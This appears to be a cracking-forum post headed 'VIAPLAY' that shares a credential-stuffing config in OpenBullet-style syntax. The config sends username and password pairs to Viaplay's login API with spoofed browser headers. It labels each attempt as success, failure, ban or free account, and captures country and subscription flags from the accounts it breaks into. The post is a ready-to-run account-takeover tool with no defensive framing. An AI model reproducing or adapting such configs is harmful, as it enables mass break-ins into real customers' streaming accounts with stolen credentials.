• We just launched and are currently in beta. Join us as we build and grow the community.

VIAPLAY

multiplexpm

Endpoint Security Specialist
M Rep
0
0
0
Rep
0
M Vouches
0
0
0
Vouches
0
Posts
54
Likes
41
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
FUNCTION URLEncode "<USER>" -> VAR "US"
REQUEST POST "https://login.viaplay.se/api/login/...ttps://content.viaplay.se/pcdash-se&username=<US>&persistent=true"
CONTENT "password=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded; charset=utf-8"
HEADER "Accept: application/json"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Accept-Language: en-US,en;q=0.9,hi;q=0.8,fr;q=0.7,pt;q=0.6,nl;q=0.5"
HEADER "Connection: keep-alive"
HEADER "Host: login.viaplay.se"
HEADER "Origin: https://viaplay.se"
HEADER "Referer: https://viaplay.se/"
HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Site: same-site"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36"
KEYCHECK
KEYCHAIN Failure OR
KEY "{\"success\":false"
KEYCHAIN Success OR
KEY "{\"success\":true"
KEYCHAIN Ban OR
KEY "<RESPONSECODE>" Contains "403"
KEYCHAIN Custom "FREE" OR
KEY "needsPackage\":true"
PARSE "<SOURCE>" JSON "accountCountry" CreateEmpty=FALSE -> CAP "Country"
PARSE "<SOURCE>" JSON "isVmsCustomer" CreateEmpty=FALSE -> CAP "isVmsCustomer"
PARSE "<SOURCE>" JSON "isRCCustomer" CreateEmpty=FALSE -> CAP "isRCCustomer"
PARSE "<SOURCE>" JSON "isTveBCustomer" CreateEmpty=FALSE -> CAP "isTveBCustomer"
 

435,248

313,796

313,805

Top